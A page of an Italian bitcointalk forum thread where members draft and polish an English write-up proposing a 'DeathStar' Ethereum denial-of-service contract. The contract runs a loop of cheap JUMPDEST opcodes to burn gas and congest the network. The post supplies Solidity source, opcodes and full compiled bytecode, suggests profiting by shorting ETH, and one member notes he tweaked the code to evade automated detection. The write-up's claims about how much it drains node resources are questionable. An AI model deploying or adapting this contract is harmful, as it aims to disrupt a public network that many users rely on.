Pages:
Author

Topic: Stato DISASTROSO rete ethereum - page 22. (Read 7113 times)

legendary
Activity: 2380
Merit: 17063
Fully fledged Merit Cycler - Golden Feather 22-23
August 27, 2021, 06:03:44 PM
ho messo il sorgente modificato ed il nuovo binario compilato,
ho aggiornato la lista reference (anche se ho un po' spaccato la formattazione.

che ne dite, posto in alt-coin?

Ti ho rimandato la nuova sezione refrence via PM, in modo che possa, se ti aggrada, rimettere i link con il titolo come avevo fatto io.
Secondo me puoi postarla nella board Alcoin Discussion.... sperando che venga notata... quellla sezione è un pò uno zoo...
legendary
Activity: 3318
Merit: 2962
August 27, 2021, 05:46:44 PM
ho messo il sorgente modificato ed il nuovo binario compilato,
ho aggiornato la lista reference (anche se ho un po' spaccato la formattazione.

che ne dite, posto in alt-coin?
legendary
Activity: 3318
Merit: 2962
August 27, 2021, 05:43:47 PM
    Attacking the Ethereum network: a possible strategy.
    By gbianchi bitcointalk.org
    Translated by fillippone.

    This study stems from some observations:

    • in the Ethereum network there is no concept of a "forbidden smart contract", the network is permissionless, meaning any user could possibly enter any type of code on the network, as long as the code is formally correct and pays for executing and running the code;
    • each "smart contract" behaves by design like a virus, that is, if run, automatically executed on all nodes, precisely because of the principle of decentralization, each node must re-execute the code to verify the work done by others and reach a consensus together with all the other nodes;
    • the only mechanism to "govern" the execution of the code is the fact that the execution of any smart contract costs gas, proportional to the number of instructions executed and the type of each instruction.
    • smart contracts are normally written in Solidity but are then compiled and translated into EVM machine language and Solidity gives the possibility to write directly in EVM assembler language;
    • once entered, the code is immutable, so there is no way to “get rid” of the smart contract from the network unless a hard fork-type like what happened with The DAO. But while the hacker of The Dao just exploited a bug in the contract to fund its child DAOs, Ethereum's core architecture is used here, making it really difficult to design a fairly effective hard fork.

    Based on these observations, it is possible to design a "DeathStar" smart contract whose execution costs as little as possible, and which "burns" ethers only to compete with the other smart contracts on the various nodes, and obtain as many processing resources as possible, slowing down and stagnating the execution of all other smart contracts.

    A group of attackers could be incentivized for various reasons to burn ethers to jeopardize the network, for example:

    • Being supporters of another competing blockchain protocol.
    • Organizing a short on Ethereum before the attack, congesting the Ethereum network and short covering at lower prices, covering the initial costs of the attack and eventually profiting from it.
    • Cause problems to one or more of the various smart contracts running on Ethereum.

    In general, any person or group with sufficient economical and technical means and with any type of interest in the decline of the Ethereum network and/or the smart contracts running there could use this line of attack.


    DeathStar technical description

    The Ethereum yellow paper is the official source of information.
     
    Inside there are (among many other things) the description of the EVM (Ethereum Virtual Machine) opcodes and the tables of the gas cost of each opcode.

    It turns out that each smart contract is compiled and converted into an EVM machine opcode, and from the table "Appendix G FEE SCHEDULE" it is stated that these opcodes have costs ranging from 0 gas (OPcode STOP, RETURN, REVERT) up to 20,000 gas or more for data store opcode, 32,000 gases for CREATE etc.

    Let us now introduce the concept of average cost per opcode. A smart contract is composed of a set of opcodes that form the smart contract’s logic, therefore functional calls, logical operations, calculations, storage of results, etc.

    The execution of a smart contract will therefore be the execution of many of these opcodes, with various costs, which ultimately lead to the total cost of the execution.

    Suppose that a smart contract executes these opcodes:
    10 of 3 gases, 5 of 8 gases, one of 700 gases and one of 20,000 gases (storage operations are very expensive).
    We will therefore have a total cost of 30 + 40 + 700 + 20,000 = 20770 gas for 17 opcodes. The average cost per opcode will therefore be 1221.76 gas.

    In order to be the most "competitive" smart contract in terms of cost per opcode, DeathStar will have to be designed around an opcode that costs as little as possible, to have the lowest average cost per opcode possible.

    You cannot use cost 0 opcodes (STOP, RETURN, REVERT) as they all terminate the execution of the smart contract.

    So let's move on to the only opcode at the cost of 1 gas: JUMPDEST.
    Jumpdest is an opcode that does almost nothing except "Mark a valid destination for jump". It does not push and/or pop from the stack, it does nothing but set a position where you can jump with a JUMP.

    The idea is to wrap a series of JUMPDEST opcodes in a loop, in such a way as to lower as much as possible the average cost per opcode to execute this loop, to make it close to 1 gas per opcode, target to which none smart contract that implements some logic will never even remotely arrive.

    But remember our purpose is not to have a logic (in fact from a processing point of view this code does not produce anything, it has no logic) it is simply to have the lowest possible average cost per opcode, to execute with a certain sum the largest possible number of opcodes that "drain" computing resources from the network.

    The last note we need to know is that ethereum has a very simple criterion for "breaking" infinite loops (the Turing Halting Problem): it ends them when the funds run out. So by appropriately loading the smart contract with funds, it will continue to run, scaling a gas to opcode (on average)  in competition with other much more expensive smart contracts in terms of average cost to opcode, which is exactly the purpose that we were set to: Have a smart contract that burns ethereum at the lowest possible cost competing with others mart running contracts that will have far higher average costs per opcode.

    A "trick" that helps us to obtain the binary code is that in the old versions of solidity (up to version 0.4) it was possible to enter tags for jump instructions in assembler and that these tags were implemented with Jumpdest opcodes, then using a sole compiler of version 0.4.x the code is compiled in an instant.
    Coincidentally, this coding technique is no longer possible in new compilers.



    DeathStar code:
    [/list]
    Code:
    pragma solidity ^0.4.0;

    // The presence of the payable modifier means that the function can process transactions with non-zero Ether value.
    // If a transaction that transfers Ether comes to the contract and calls some function X,
    // then if this function X does not have the payable modifier, then the transaction will be rejected.

    // Add a fake input and ouput value, so simulate a some logic.
    // Note the final code is never excecuted.


    contract DeathStar
       {
       function DeathLoop(uint x)  public payable returns (bool)
          {
          assembly
           {
           // jumpdest price 1 gas
           loop000:
           loop001:
           loop002:
           loop003:
           loop004:
           ...
           loop996:
           loop997:
           loop998:
           loop999:
           // push address stack+1 price  Wverylow=3gas
           // jmp address  stack-1 price  Wmid=8gas
           jump(loop000)
           }

         // fake code never executed
         if (x > 5) return(true);
         else       return(false);
         }
       }



    Once compiled, it is shown as:
    Code:
    ...

    JUMPDEST
    JUMPDEST
    JUMPDEST
    ...
    JUMPDEST
    JUMPDEST
    PUSH2 0x6E
    JUMP

    With 1000 jumpdest (each loopxxx tag: generates a jumpdest) + a push (cost 3 gas) + a jump (cost 8 gas) we have 1002 opcode at 1011 gas the average cost per opcode of the loop is therefore around 1.0089 gas.
    Assuming a gas cost of 36 Gwei, we have an average cost per instruction of 36.32 Gwei per opcode, i.e. with a single Ethereum we can perform 27,500,000 opcodes.
    Note that adding more jumpdest lengthens the code but improves the average cost per opcode very marginally, I don't think it's worth it.

    Binary code of the compiled smart contract:

    Binary:
    Code:

    6060604052341561000c57fe5b5b6104958061001c6000396000f30060606040526000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680636e62ff351461003b575bfe5b610051600480803590602001909190505061006b565b604051808215151515815260200191505060405180910390f35b60005b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b61006e565b60009050610464565b5b9190505600a165627a7a72305820b5446b266264bd3c7a82cb31fb01f7458fbd7dd1815773c5a6f5c0bc86dabb8f0029



    Thanks to the guys from the Italian community of bitcointalk.org (filippone, acquafredda, HostFat, jack0m and others) who gave me interesting ideas for the realization of this study.


    References:

    ETHEREUM: A SECURE DECENTRALISED GENERALISED TRANSACTION LEDGER
    The Ethereum Virtual Machine — How does it work?
    WHAT IS ETHEREUM MINING?
    Does every node execute the contract code for each transaction?
    Smart contract execution without making transaction on ethereum blockchain
    View/Pure Gas usage - Cost gas if called internally by another function?
    What is the difference between a transaction and a call?
    Calls vs. transactions in Ethereum smart contracts
    How Bitcoin and Ethereum solved the Halting Problem differently
    Why is Bitcoin not Turing complete?

    legendary
    Activity: 3845
    Merit: 2053
    August 27, 2021, 05:22:15 PM
    A proposito del fatto che almeno metà dei nodi se ne sta sul cloud, giusto per ricordare quanto sia falsa la percezione di sicurezza che in molti hanno su questi ambienti:

    https://www.repubblica.it/tecnologia/2021/08/27/news/microsoft_azure_non_e_sicura_lo_denuncia_un_ex_dipendente-315517071/
    legendary
    Activity: 2380
    Merit: 17063
    Fully fledged Merit Cycler - Golden Feather 22-23
    August 27, 2021, 04:32:24 PM
     
    Fammi una cortesia, come eravamo d'accordo passami via PM la pagina formattata con
    il formato del forum. Preferisco metterla a punto qui sul forum, gia' nel formato che poi usero' per il post.


    é stato fatto. Hai un PM con la pagina. Facci sapere qui dove e quando lo hai postato che diamo supporto!
    legendary
    Activity: 3766
    Merit: 1742
    Join the world-leading crypto sportsbook NOW!
    August 27, 2021, 02:27:00 PM

    Comincio a credere (a temere) che qualsiasi cosa succeda su ethereum, per quanto grave,  non importi nulla a nessuno.
    Forse solo un blocco totale della rete potrebbe impattare, ma tutto il resto passa inosservato.


    Anzichè credere, basta che guardi il passato con ETC (molto più piccola e distruttibile). Double spending folli... E non è morta.
    legendary
    Activity: 2380
    Merit: 17063
    Fully fledged Merit Cycler - Golden Feather 22-23
    August 27, 2021, 12:27:46 PM

    Comincio a credere (a temere) che qualsiasi cosa succeda su ethereum, per quanto grave,  non importi nulla a nessuno.
    Forse solo un blocco totale della rete potrebbe impattare, ma tutto il resto passa inosservato.


    È oramai conclamato:


    https://twitter.com/aaronvanw/status/1431279882592477192?s=21

    Non che ci volesse granché…
    legendary
    Activity: 3318
    Merit: 2962
    August 27, 2021, 12:20:37 PM

    Comincio a credere (a temere) che qualsiasi cosa succeda su ethereum, per quanto grave,  non importi nulla a nessuno.
    Forse solo un blocco totale della rete potrebbe impattare, ma tutto il resto passa inosservato.
    legendary
    Activity: 3318
    Merit: 2962
    August 27, 2021, 12:18:15 PM
    Ho rivisto e apportato alcuni suggerimenti con correzioni al testo tradotto inizialmente da filli.
    Dal punto di vista tecnico non mi sono espresso non essendo mia materia, a livello linguistico mi sembra fili ho condiviso soltanto migliorie minimali e aggiunto alcuni punti che secondo me andavano menzionati.
    Per il resto, per lo scopo del thread a me sembra pronto per essere dato in pasto al mondo.
    https://docs.google.com/document/d/1lVAFE-2RjhTqPS8P58ZaW8uBE2bhWz-3n0ksZRJ39Wk/edit

    Ho accettato le revisioni proposte da acquafredda.
    A questo punto @gbianchi, se vuoi aggiornare il codice, dovremmo essere pronti.



    Fammi una cortesia, come eravamo d'accordo passami via PM la pagina formattata con
    il formato del forum. Preferisco metterla a punto qui sul forum, gia' nel formato che poi usero' per il post.
    legendary
    Activity: 2380
    Merit: 17063
    Fully fledged Merit Cycler - Golden Feather 22-23
    August 27, 2021, 09:50:36 AM
    #99
    Ho rivisto e apportato alcuni suggerimenti con correzioni al testo tradotto inizialmente da filli.
    Dal punto di vista tecnico non mi sono espresso non essendo mia materia, a livello linguistico mi sembra fili ho condiviso soltanto migliorie minimali e aggiunto alcuni punti che secondo me andavano menzionati.
    Per il resto, per lo scopo del thread a me sembra pronto per essere dato in pasto al mondo.
    https://docs.google.com/document/d/1lVAFE-2RjhTqPS8P58ZaW8uBE2bhWz-3n0ksZRJ39Wk/edit

    Ho accettato le revisioni proposte da acquafredda.
    A questo punto @gbianchi, se vuoi aggiornare il codice, dovremmo essere pronti.
    legendary
    Activity: 1316
    Merit: 1481
    August 27, 2021, 07:05:09 AM
    #98
    Ho rivisto e apportato alcuni suggerimenti con correzioni al testo tradotto inizialmente da filli.
    Dal punto di vista tecnico non mi sono espresso non essendo mia materia, a livello linguistico mi sembra fili ho condiviso soltanto migliorie minimali e aggiunto alcuni punti che secondo me andavano menzionati.
    Per il resto, per lo scopo del thread a me sembra pronto per essere dato in pasto al mondo.
    https://docs.google.com/document/d/1lVAFE-2RjhTqPS8P58ZaW8uBE2bhWz-3n0ksZRJ39Wk/edit
    legendary
    Activity: 3318
    Merit: 2962
    August 26, 2021, 04:56:58 PM
    #97
    Interessante discussione.

    La possibilità (teorica o pratica) di questo tipo di attacchi è una conseguenza delle scelte architetturali di Ethereum che ha preferito integrare nello stesso layer base le funzioni monetarie (ether, con cui si pagano le fees anche degli smart contracts) e quelle computazionali (gli smart contracts).

    L'attacco di spam di cui si parla in questo thread non sarebbe concettualmente molto diverso da mandare avanti e indietro gli stessi satoshi su rete Bitcoin per N volte fin quando lo spazio di blocco non viene saturato rendendo impossibile processare nuove transazioni. Anche lì tutto si tradurrebbe in un'analisi costi-risultati.

    La differenza sta appunto nel fatto che i vettori di attacco su Bitcoin si limitano all'aspetto monetario, mentre su Ethereum coinvolgono il lato monetario e quello computazionale, che sono indissolubilmente legati.

    La scelta adottata da Bitcoin è stata invece quella di tenere gli smart contracts di tipo Turing-complete fuori dalla catena principale (su una sidechain come RSK): in questo modo un attacco del tipo descritto su questo thread avrebbe effetti solo sulla sidechain, il cui gas è una valuta parallela a bitcoin (RBTC), e non pregiudicherebbe in nessun modo il funzionamento del layer monetario di base.

    Una architettura più complessa, più difficile da sviluppare ma più facile da mantenere e da proteggere nel suo "core" (la blockhain bitcoin principale).  

    Per quanto riguarda lo scaling e la decentralizzazione di Ethereum la strada intrapresa è quella dello "sharding", ma viene, come il passaggio al POS, periodicamente rimandato. Le ultime news sono nel 2022 sebbene i contorni di questa tecnologia siano ancora molto fumosi

    https://ethereum.org/en/eth2/shard-chains/#what-is-sharding


    infatti la modulazione di costi degli opcode e' un tema fisso (anche se per nulla publicizzato)
    degli hard fork. QUi ad esempio definisce
    https://github.com/ethereum/execution-specs/blob/master/network-upgrades/mainnet-upgrades/berlin.md
    una nuova rimodulazione del costo degli opcode.

    Effettivamente l'assegnare un costo "adeguato" agli opcode dovrebbe essere una funzione dinamica,
    in base all'utilizzo medio. Il solo fatto di avere degli opcode a costo prefissato e' un errore progettuale non da poco.

    Supponiamo che la mia strategia di attacco funzioni, e che la soluzione sia di aumentare il costo dell'opcode "jumpdest" con un hard fork.
    Ma immediatamente si puo' riproporre un attacco del genere su un altro tipo di opcode appena piu' costoso.

    E cosi' via all'infinito.


     
    legendary
    Activity: 2506
    Merit: 4425
    August 26, 2021, 04:47:58 PM
    #96
    Interessante discussione.

    La possibilità (teorica o pratica) di questo tipo di attacchi è una conseguenza delle scelte architetturali di Ethereum che ha preferito integrare nello stesso layer base le funzioni monetarie (ether, con cui si pagano le fees anche degli smart contracts) e quelle computazionali (gli smart contracts).

    L'attacco di spam di cui si parla in questo thread non sarebbe concettualmente molto diverso da mandare avanti e indietro gli stessi satoshi su rete Bitcoin per N volte fin quando lo spazio di blocco non viene saturato rendendo impossibile processare nuove transazioni. Anche lì tutto si tradurrebbe in un'analisi costi-risultati.

    La differenza sta appunto nel fatto che i vettori di attacco su Bitcoin si limitano all'aspetto monetario, mentre su Ethereum coinvolgono il lato monetario e quello computazionale, che sono indissolubilmente legati.

    La scelta adottata da Bitcoin è stata invece quella di tenere gli smart contracts di tipo Turing-complete fuori dalla catena principale (su una sidechain come RSK): in questo modo un attacco del tipo descritto su questo thread avrebbe effetti solo sulla sidechain, il cui gas è una valuta parallela a bitcoin (RBTC), e non pregiudicherebbe in nessun modo il funzionamento del layer monetario di base.

    Una architettura più complessa, più difficile da sviluppare ma più facile da mantenere e da proteggere nel suo "core" (la blockhain bitcoin principale).  

    Per quanto riguarda lo scaling e la decentralizzazione di Ethereum la strada intrapresa è quella dello "sharding", ma viene, come il passaggio al POS, periodicamente rimandato. Le ultime news sono nel 2022 sebbene i contorni di questa tecnologia siano ancora molto fumosi

    https://ethereum.org/en/eth2/shard-chains/#what-is-sharding
    legendary
    Activity: 3318
    Merit: 2962
    August 26, 2021, 03:26:20 AM
    #95


    Ma davvero ETH ha un yellow-paper?
    Conoscevo i white paper, anche prima di Bitcoin.... ma yellow paper mi è nuova... anche se apparentemente c'è un significato:



    Si, anche se (come ho gia' scritto) assomiglia un po' alla scritta sul muro della fattoria degli animali...
    per essere buoni diciamo che e' abbastanza fluido. Infatti lo tengono in github.

    Io nel frattempo ho fatto qualche piccola modifica al codice per renderlo piu' facilmente utilizzabile,
    e anche meno palesemente "inutile" (per rendere un po' piu' difficile un'eventuale individuazione automatica)


    EDIT

    ecco una lista delle versioni
    https://github.com/ethereum/yellowpaper/blob/master/BRANCHES.md


    che mostra che e' stato gia' fatto questo hard fork  (tangerine-wistle)  
    con aumento di costi per istruzioni Smiley


        Increase the gas cost of EXTCODESIZE to 700 (from 20).
        Increase the base gas cost of EXTCODECOPY to 700 (from 20).
        Increase the gas cost of BALANCE to 400 (from 20).
        Increase the gas cost of SLOAD to 200 (from 50).
        Increase the gas cost of CALL, DELEGATECALL, CALLCODE to 700 (from 40).
        Increase the gas cost of SELFDESTRUCT to 5000 (from 0).
        If SELFDESTRUCT hits a newly created account, it triggers an additional gas cost of 25000 (similar to CALLs).
        Increase the recommended gas limit target to 5.5 million.
        Define “all but one 64th” of N as N - floor(N / 64).
        If a call asks for more gas than the maximum allowed amount (i.e. the total amount of gas remaining in the parent after subtracting the gas cost of the call and memory expansion), do not return an OOG error; instead, if a call asks for more gas than all but one 64th of the maximum allowed amount, call with all but one 64th of the maximum allowed amount of gas (this is equivalent to a version of EIP-901 plus EIP-1142). CREATE only provides all but one 64th of the parent gas to the child call.


    e questo hard fork spurious-dragon ha aumentato il costo di EXP

    legendary
    Activity: 2380
    Merit: 17063
    Fully fledged Merit Cycler - Golden Feather 22-23
    August 26, 2021, 02:49:56 AM
    #94


    Nel frattempo mi appunto qui qualche link che sono certo mi verra' utile,



    Aggiunti, insieme al yellow-paper, in una sezione REFERENCES alla fine del documento.
    Così sembra molto più professionale.



    Ma davvero ETH ha un yellow-paper?
    Conoscevo i white paper, anche prima di Bitcoin.... ma yellow paper mi è nuova... anche se apparentemente c'è un significato:

    Differences Between a White Paper, Yellow Paper, and Beige Paper
    Quote

    The Yellow Paper
    A yellow paper is a more technical version of the white paper. It presents the scientific details of the technology in a very concise way. If you think of a white paper as a proposal, the yellow paper can be a part two where all the specific details are.
    legendary
    Activity: 3318
    Merit: 2962
    August 25, 2021, 05:16:43 PM
    #93
    Va bene sezione alt-coin, dato che shitcoin ancora non c'è  Grin
    Appena possibile cerco di riguardarla ma penso il buon merit rascal abbia fatto certamente un buon lavoro.
    Sì senza dubbio si può partire da qui anche se sarebbe bello sottoporla anche su piattaforme più eth based che non ho idea di quali siano.

    Grazie, appena lo hai controllato dillo a filippone che mi prepara il formato "postabile"

    Nel frattempo mi appunto qui qualche link che sono certo mi verra' utile,
    si parla delle funzioni "pure" (e' proprio una sintassi di solidity)
    ossia le funzioni che non leggono ne' scrivono sulla blockchain,
    ma sono esclusivamente computazionali.


    https://ethereum.github.io/yellowpaper/paper.pdf (sezione 6 dello yellow paper modalita' di esecuzione degli smart contract)
    https://ethereum.org/en/developers/docs/consensus-mechanisms/pow/mining/
    https://medium.com/mycrypto/the-ethereum-virtual-machine-how-does-it-work-9abac2b7c9e
    https://ethereum.stackexchange.com/questions/357/does-every-node-execute-the-contract-code-for-each-transaction
    https://ethereum.stackexchange.com/questions/52885/view-pure-gas-usage-cost-gas-if-called-internally-by-another-function
    https://ethereum.stackexchange.com/questions/765/what-is-the-difference-between-a-transaction-and-a-call/770
    https://blog.b9lab.com/calls-vs-transactions-in-ethereum-smart-contracts-62d6b17d0bc2
    https://infernaltoast.medium.com/how-bitcoin-and-ethereum-solved-the-halting-problem-differently-cffbb4e3045c
    https://www.quora.com/Why-is-Bitcoin-not-Turing-complete

    Da non includere
    https://raw.githubusercontent.com/chronaeon/beigepaper/master/beigepaper.pdf
    https://hugonguyen.medium.com/why-ethereum-architecture-is-flawed-d4eefd15db3e
    https://ethereum.stackexchange.com/questions/78310/smart-contract-execution-without-making-transaction-on-ethereum-blockchain
    ...
    legendary
    Activity: 1316
    Merit: 1481
    August 25, 2021, 12:27:10 PM
    #92
    Va bene sezione alt-coin, dato che shitcoin ancora non c'è  Grin
    Appena possibile cerco di riguardarla ma penso il buon merit rascal abbia fatto certamente un buon lavoro.
    Sì senza dubbio si può partire da qui anche se sarebbe bello sottoporla anche su piattaforme più eth based che non ho idea di quali siano.
    legendary
    Activity: 3318
    Merit: 2962
    August 24, 2021, 04:18:24 AM
    #91

    Potete partire da questo ed usarlo e modifcarlo.



    TI ho messo qualche nota, guarda se le vedi

    Ho accettato i suggerimenti, e già che c'ero ho corretto qualche errore di battitura e reso un pò più snella la forma.
    Giusto per evitare troppi sbattimenti formattando il documento con link o quant'altro: vuoi pubblicare solo in un thread qui su bitcointalk o vuoi metterlo su medium/ altre parti?


    In una prima fase probabilmente e' meglio mtterlo qui su bitcointalk come post.

    Tipo, se arriva uno e mi dice "e' una solenne cazzata per questo e quest'altro FONDATO motivo" allora e' inutile qualsiasi sbattimento ulteriore.
    Oppure arriva un'altro e fa "ah si interessante ma c'e' questo e quest'altro che non funziona" e quindi bisogna sistemarlo...
    insomma direi che in una prima fase e' meglio stare fluidi Smiley


    Sono d'accordissimo.
    Quando pensi che sia pronto, magari aspettiamo anche acquafredda, posso prepararti la versione "codificata" per bitcointalk (link, elenchi etc) e te la mando via PM, in modo che tu possa quindi semplicemente copiare come OP su un nuovo thread.



    Ok perfetto, poi quando me la manderai prima la posto qui per vedere che faccia fa, poi se va bene creo un thread nella sezione alt-coin internazionale.

    qui per capirci : https://bitcointalk.org/index.php?board=67.0

    (o sai se c'e' una sezione piu' adatta?)
    legendary
    Activity: 2380
    Merit: 17063
    Fully fledged Merit Cycler - Golden Feather 22-23
    August 24, 2021, 04:15:57 AM
    #90

    Potete partire da questo ed usarlo e modifcarlo.



    TI ho messo qualche nota, guarda se le vedi

    Ho accettato i suggerimenti, e già che c'ero ho corretto qualche errore di battitura e reso un pò più snella la forma.
    Giusto per evitare troppi sbattimenti formattando il documento con link o quant'altro: vuoi pubblicare solo in un thread qui su bitcointalk o vuoi metterlo su medium/ altre parti?


    In una prima fase probabilmente e' meglio mtterlo qui su bitcointalk come post.

    Tipo, se arriva uno e mi dice "e' una solenne cazzata per questo e quest'altro FONDATO motivo" allora e' inutile qualsiasi sbattimento ulteriore.
    Oppure arriva un'altro e fa "ah si interessante ma c'e' questo e quest'altro che non funziona" e quindi bisogna sistemarlo...
    insomma direi che in una prima fase e' meglio stare fluidi Smiley


    Sono d'accordissimo.
    Quando pensi che sia pronto, magari aspettiamo anche acquafredda, posso prepararti la versione "codificata" per bitcointalk (link, elenchi etc) e te la mando via PM, in modo che tu possa quindi semplicemente copiare come OP su un nuovo thread.

    Pages:
    Jump to: